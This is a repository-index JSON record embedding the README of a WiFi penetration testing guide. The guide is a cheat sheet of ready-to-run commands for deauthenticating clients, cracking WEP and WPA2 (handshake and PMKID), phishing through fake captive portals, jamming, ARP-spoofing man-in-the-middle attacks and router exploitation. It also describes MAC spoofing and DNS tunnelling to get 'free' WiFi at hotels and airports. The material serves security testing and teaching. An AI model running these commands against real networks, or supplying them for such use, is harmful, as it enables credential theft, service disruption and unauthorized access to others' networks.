{"id":13797320,"url":"https://github.com/ricardojoserf/wifi-pentesting-guide","last_synced_at":"2026-01-18T02:58:55.559Z","repository":{"id":54365500,"uuid":"179707852","full_name":"ricardojoserf/wifi-pentesting-guide","owner":"ricardojoserf","description":"WiFi Penetration Testing Guide","archived":false,"fork":false,"pushed_at":"2023-12-14T17:06:44.000Z","size":563,"stargazers_count":419,"open_issues_count":0,"forks_count":77,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-11-18T11:41:00.290Z","etag":null,"topics":["offensive-security","offensivesecurity","pentest-scripts","pentesting","pentesting-tools","wifi","wifi-hacking","wifi-network","wifi-security"],"latest_commit_sha":null,"homepage":"https://ricardojoserf.github.io/wifiguide/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ricardojoserf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-04-05T15:27:01.000Z","updated_at":"2024-11-13T09:17:58.000Z","dependencies_parsed_at":"2023-12-14T18:29:45.099Z","dependency_job_id":"88bf92b3-ccf8-46a5-aa32-25bf043aa2ea","html_url":"https://github.com/ricardojoserf/wifi-pentesting-guide","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ricardojoserf","download_url":"https://codeload.github.com/ricardojoserf/wifi-pentesting-guide/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253859783,"owners_count":21975175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["offensive-security","offensivesecurity","pentest-scripts","pentesting","pentesting-tools","wifi","wifi-hacking","wifi-network","wifi-security"],"created_at":"2024-08-03T23:01:27.659Z","updated_at":"2026-01-18T02:58:55.512Z","avatar_url":"https://github.com/ricardojoserf.png","language":"Python","funding_links":[],"categories":["HarmonyOS","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["Windows Manager"],"readme":"# WiFi Penetration Testing Guide\r\n\r\n## Index\r\n\r\n1. [Basic commands](#1)\r\n\r\n2. [Open networks](#2)\r\n\r\n\t2.1. [Captive portals](#21)\r\n\r\n\t2.2. [Man in the Middle attack](#22)\r\n\r\n3. [WEP cracking](#3)\r\n\r\n\t3.1. [No clients](#31)\r\n\r\n4. [WPA2-PSK cracking](#4)\r\n\r\n\t4.1. [Cracking the 4-way-handshake](#41)\r\n\t\r\n\t4.2. [PMKID attack](#42)\r\n\r\n\t4.3. [AP-less attack](#43)\r\n\r\n5. [WPA2-Enterprise](#5)\r\n\r\n\t5.1. [Fake Access Points](#51)\r\n\t\r\n\t5.2. [Brute force](#52)\r\n\t\r\n\t5.3. [EAP methods supported](#53)\r\n\r\n6. [Other attacks](#6)\r\n\r\n\t6.1. [Krack Attack and Frag Attack](#61)\r\n\r\n\t6.2. [OSINT](#62)\r\n\r\n\t6.3. [Wifi Jamming](#63)\r\n\r\n\t6.4. [Other frameworks](#64)\r\n\r\n7. [Post-exploitation](#7)\r\n\r\n\t7.1. [Attacking the router](#71)\r\n\t\r\n\t7.2. [Types of scanners](#72)\r\n\t\r\n\t7.3. [Spoofing](#73)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"1\"\u003e\u003c/a\u003e1. Basic commands\r\n\r\n\r\n#### Set environment variable\r\n\r\n```bash\r\nVARIABLE=value\r\n```\r\n\r\n#### Check interface mode \r\n\r\n```bash\r\niwconfig $IFACE\r\n```\r\n\r\n#### Check interface status\r\n\r\n```bash\r\nifconfig $IFACE\r\n```\r\n\r\n#### Set monitor mode \r\n\r\n```\r\nairmon-ng check kill\r\nifconfig $IFACE down\r\niwconfig $IFACE mode monitor\r\nifconfig $IFACE up\r\n```\r\n\r\n\r\n#### List networks\r\n\r\n1. Set monitor mode\r\n\r\n2. Run Airodump-ng-ng\r\n\r\n```bash\r\nairodump-ng $IFACE -c $CHANNEL -e $ESSID\r\n```\r\n\r\n\r\n#### Deauthentication\r\n\r\n1. Only one client\r\n\r\n```bash\r\n aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE\r\n```\r\n\r\n2. An Access Point (= all the clients in the AP)\r\n\r\n```bash\r\n aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE\r\n```\r\n\r\n#### Get hidden SSID with clients\r\n\r\n1. List networks\r\n\r\nList the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.\r\n\r\n2. Deauthenticate\r\n\r\nIn another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:\r\n\r\n```bash\r\naireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE\r\n```\r\n\r\n#### Get hidden SSID without clients\r\n\r\n1. List networks\r\n\r\nList the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.\r\n\r\n2.a. Execute a dictionary attack\r\n\r\n```\r\nmdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH\r\n```\r\n\r\n2.b. Or execute a bruteforce attack\r\n\r\n```\r\nmdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET\r\n```\r\n\r\nFor the character set it is possible to use *l* (lowercase letters), *u* (uppercase letters), *n* (numbers), *c* (lowercase+uppercase), *m* (lowercase+uppercase+numbers) or *a* (all printed).\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"2\"\u003e\u003c/a\u003e2. Open networks\r\n\r\n## \u003ca name=\"21\"\u003e\u003c/a\u003e2.1. Captive portals\r\n\r\n### 2.1.1. Fake captive portals\r\n\r\n\r\n1. Clone a website using [HTTrack](https://www.httrack.com/) \r\n\r\n2. Install [Wifiphiser](https://github.com/wifiphisher/wifiphisher). Add the HTTrack result in a new folder in *wifiphisher/data/phishing-pages/*new_page*/html* and a configuration file in  *wifiphisher/data/phishing-pages/*new_page*/config.ini*. \r\n\r\n3. Recompile the project using *python setup.py install* or the binary in *bin*. \r\n\r\n4. This command works correctly in the latest Kali release after installing hostapd:\r\n\r\n```\r\ncd bin \u0026\u0026 ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n### 2.1.2. Bypass 1: MAC spoofing\r\n\r\nThe first method to bypass a captive portal is to change your MAC address to one of an already authenticated user\r\n\r\n1. Scan the network and get the list of IP and MAC addresses. You can use:\r\n\r\n- nmap\r\n\r\n- A custom script like [this](scripts/open/get_mac_ip.sh) (Bash) or [this](scripts/open/get_mac_ip.py) (Python)\r\n\r\n2. Change your IP and MAC addresses. You can use:\r\n\r\n- macchanger\r\n\r\n- A custom script like [this](scripts/open/change_mac_ip.sh)(Bash)\r\n\r\n\r\nAlso, you can use scripts to automate the process like:\r\n\r\n- [Poliva script](https://raw.githubusercontent.com/poliva/random-scripts/master/wifi/hotspot-bypass.sh)\r\n\r\n- [Hackcaptiveportals](https://github.com/systematicat/hack-captive-portals)\r\n\r\n\u003cbr\u003e\r\n\r\n### 2.1.3. Bypass 2: DNS tunnelling\r\n\r\nA second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get \"free\" Wifi in hotel, airports...\r\n\r\n\r\n1. Check the domain names are resolved:\r\n\r\n```\r\nnslookup example.com\r\n```\r\n\r\n2. Create 2 DNS records (in [Digital ocean](https://www.digitalocean.com/), [Afraid.org](http://freedns.afraid.org/)...):\r\n\r\n- One \"A record\":  dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)\r\n\r\n- One \"NS record\": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)\r\n\r\n\r\n3. Execution in the server\r\n\r\n```\r\niodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN\r\n```\r\n\r\n4. Check if it works correctly in [here](https://code.kryo.se/iodine/check-it/)\r\n\r\n\r\n5. Execution in the client\r\n\r\n```\r\niodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN\r\n```\r\n\r\n6. Create the tunnel\r\n\r\n```\r\nssh -D 8080 $USER@10.0.0.1\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"22\"\u003e\u003c/a\u003e2.2. Man in the Middle attack\r\n\r\nOnce you are in the network, you can test if it is vulnerable to Man in the Middle attacks.\r\n\r\n1. ARP Spoofing attack using [Ettercap](https://www.ettercap-project.org/)\r\n\r\n2. Sniff the traffic using Wireshark or TCPdump\r\n\r\n3. Analyze the traffic using [PCredz](https://github.com/lgandx/PCredz) (Linux) or [Network Miner](https://www.netresec.com/?page=networkminer) (Windows)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"3\"\u003e\u003c/a\u003e3. WEP cracking\r\n\r\n1. Start capture\r\n```bash\r\nairodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE\r\n```\r\n\r\n\r\n2. Accelerate the IV capture using *Fake authentication* + *Arp Request Replay Attack* + *Deauthenticate user*. Stop Airodump at ~100.000 different IVs\r\n\r\n```bash\r\naireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE\r\naireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE\r\naireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE\r\n```\r\n\r\n3. Crack the password using Aircrack-ng\r\n```bash\r\naircrack-ng $PCAP_FILE\r\n```\r\n\r\n\r\n-------------------------\r\n\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"4\"\u003e\u003c/a\u003e4. WPA2-PSK cracking\r\n\r\n## \u003ca name=\"41\"\u003e\u003c/a\u003e4.1. Cracking the 4-way-handshake\r\n\r\n1. Start capture\r\n\r\n```bash\r\nairodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE\r\n```\r\n\r\n2. Deauthenticate an user. Stop airodump capture when you see a message 'WPA handshake: $MAC'\r\n\r\n```bash\r\naireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE\r\n```\r\n\r\n3. Option 1: Crack the handshake using Aircrack-ng\r\n\r\n```bash\r\naircrack-ng -w $WORDLIST capture.cap\r\n```\r\n\r\nYou can get wordlists from [here](https://github.com/kennyn510/wpa2-wordlists).\r\n\r\n4. Option 2: Crack the handshake using Pyrit\r\n\r\n```\r\npyrit -r $PCAP_FILE analyze\r\npyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip\r\npyrit -i $WORDLIST import_passwords\r\npyrit eval\r\npyrit batch\r\npyrit -r $CLEAN_PCAP_FILE attack_db\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"42\"\u003e\u003c/a\u003e4.2. PMKID attack\r\n\r\nYou can use [this script](scripts/wpa/pmkid.sh) or follow these steps:\r\n\r\n1. Install Hcxdumptool and Hcxtool (you can use this [script](scripts/wpa/pmkid_install.sh)).\r\n\r\n2. Stop Network Manager\r\n\r\n```bash\r\nairmon-ng check kill\r\n```\r\n\r\n\r\n\r\n3a. If you want to attack a specific MAC address\r\n\r\n- Create a text file ($FILTER_FILE) and add the MAC address without \":\". You can use *sed* and redirect the output to a file:\r\n\r\n```\r\necho $MAC | sed 's/://g' \u003e $FILTER_FILE\r\n```\r\n\r\n- Capture PMKID\r\n\r\n```bash\r\nhcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2\r\n```\r\n\r\n4. Create $HASH_FILE \r\n\r\n```bash\r\nhcxpcaptool -z $HASH_FILE $PCAPNG_FILE\r\n```\r\n \r\nThe structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html) \r\n\r\n5. Crack it using Hashcat (option 16800)\r\n\r\n```bash\r\nhashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"43\"\u003e\u003c/a\u003e4.3. AP-less attack\r\n\r\nIf you have access to a client device with the Wifi connection turned on but there is not a network around, you can still attack that network if the client devices has previously connected to it. \r\n\r\nFor that, you have to create a Fake Access Point using hostpad with a configuration file like [this one](https://gist.github.com/nickpegg/059ad1e0a0a14671892e), with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in the [4.1 section in this guide](#41).\r\n\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# 5. \u003ca name=\"5\"\u003e\u003c/a\u003e WPA2-Enterprise\r\n\r\n## 5.1 \u003ca name=\"51\"\u003e\u003c/a\u003eFake Access Points\r\n\r\n### Virtual machines download\r\n\r\n| Operating system | Platform | Credentials | Size | Link |\r\n| ---------------- | -------- | ----------- | ---- | ---- |\r\n| Ubuntu 16.04.5   | VMware   | ricardojoserf:wifi | 3.25 GB | [MEGA](https://mega.nz/file/5glEzKKa#SCmh95KdM28uPt-h8J5xtu4pQrnn_3yrI2kLnaSq3nw) |\r\n| Kali 2019.1      | VMware   | root:wifi          | 4.99 GB | [MEGA](https://mega.nz/file/11sDVSoB#KMq5yWvuGUFwGhqzd-5hE21Xsfxsp0UMauQKntMbs38) |\r\n| Ubuntu 16.04.5   | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | [MEGA](https://mega.nz/file/N5slGZLC#Dx1rBEMoNOAqdaEpB7BHhRi26HDxkJlyoQNk0frWDkw) |\r\n| Kali 2019.1      | VirtualBox (OVA) | root:wifi        | 5.56 GB | [MEGA](https://mega.nz/file/pl0j3ZwC#zE_skdeUCLoOSQHvtHrvejmA4Ktn9Qk0Sk0qI1d4KeI) |\r\n\r\n### Local installation\r\n\r\nIn case you do not want to use the virtual machine, you can install everything using:\r\n\r\n```\r\ngit clone https://github.com/ricardojoserf/WPA_Enterprise_Attack\r\n\r\ncd WPA_Enterprise_Attack \u0026\u0026 sudo sh install.sh\r\n```\r\n\r\n### Hostapd \u0026 Freeradius-wpe\r\n\r\nStart the Access Point using:\r\n\r\n```\r\nsh freeradius_wpe_init.sh $AP_NAME $INTERFACE\r\n```\r\n\r\nWhen a client connects, read logs with:\r\n\r\n```\r\nsh freeradius_wpe_read.sh\r\n```\r\n\r\n### Hostapd-wpe\r\n\r\n```\r\nsh hostapd_wpe_init.sh $AP_NAME $INTERFACE\r\n```\r\n\r\n\r\n\r\n## 5.2 \u003ca name=\"52\"\u003e\u003c/a\u003eBrute force\r\n\r\n- [Airhammer](https://github.com/Wh1t3Rh1n0/air-hammer)\r\n\r\n## 5.3 \u003ca name=\"53\"\u003e\u003c/a\u003eEAP methods supported\r\n\r\nFind supported EAP methods\r\n\r\n- [EAP_buster](https://github.com/blackarrowsec/EAP_buster)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"6\"\u003e\u003c/a\u003e6. Other attacks\r\n\r\n\r\n## \u003ca name=\"61\"\u003e\u003c/a\u003e6.1. Krack Attack and Frag Attack\r\n\r\nThese are two advanced attacks discovered by the great [Mathy Vanhoef](https://twitter.com/vanhoefm):\r\n\r\n- [Krack Attack Scripts](https://github.com/vanhoefm/krackattacks-scripts) - Explained in [this website](https://www.krackattacks.com/)\r\n\r\n- [Frag Attack Scripts](https://github.com/vanhoefm/fragattacks) - Explained in [this website](https://www.fragattacks.com/)\r\n\r\n\r\n## \u003ca name=\"62\"\u003e\u003c/a\u003e6.2. OSINT\r\n\r\n- [Wigle](https://wigle.net/)\r\n\r\n\r\n\r\n## \u003ca name=\"63\"\u003e\u003c/a\u003e6.3. Wifi Jamming\r\n\r\n- [Wifijammer](https://github.com/DanMcInerney/wifijammer) - This program can send deauthentication packets to both APs and clients. \r\n\r\nAn example to deauthenticate all the devices except a Fake Acess Point:\r\n\r\n```\r\nsudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC\r\n```\r\n\r\n## \u003ca name=\"64\"\u003e\u003c/a\u003e6.4. Other frameworks\r\n\r\nLinux:\r\n- [Sniffair](https://github.com/Tylous/SniffAir)\r\n- [Wifi Pumpkin](https://github.com/P0cL4bs/wifipumpkin3) - Framework for Rogue WiFi Access Point Attack\r\n- [Eaphammer](https://github.com/s0lst1c3/eaphammer) - Framework for Fake Access Points\r\n- [WEF](https://github.com/D3Ext/WEF) - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more\r\n\r\nWindows:\r\n- [Acrylic](https://www.acrylicwifi.com) - Useful for recon phase\r\n- [Ekahau](https://www.ekahau.com/) - Useful for Wi-Fi planning\r\n- [Vistumbler](https://www.vistumbler.net/) - Useful for wardriving\r\n\r\n\r\n\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"7\"\u003e\u003c/a\u003e7. Post-exploitation\r\n\r\nOnce you are connected to the network\r\n\r\n## \u003ca name=\"71\"\u003e\u003c/a\u003e7.1. Attacking the router\r\n\r\n- [Routersploit](https://github.com/threat9/routersploit) - Exploitation Framework for Embedded Devices - Test \"use scanners/autopwn\"\r\n\r\n## \u003ca name=\"72\"\u003e\u003c/a\u003e7.2. Types of scanners\r\n\r\n- Nmap/Zenmap - Security Scanner, Port Scanner, \u0026 Network Exploration Tool\r\n\r\n- Masscan - The faster version of nmap (it can break things, so be careful)\r\n\r\n- Netdiscover - ARP sniffing. Very useful if the networks are very well segmented\r\n\r\n## \u003ca name=\"73\"\u003e\u003c/a\u003e7.3. Spoofing\r\n\r\n- Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide/lists"}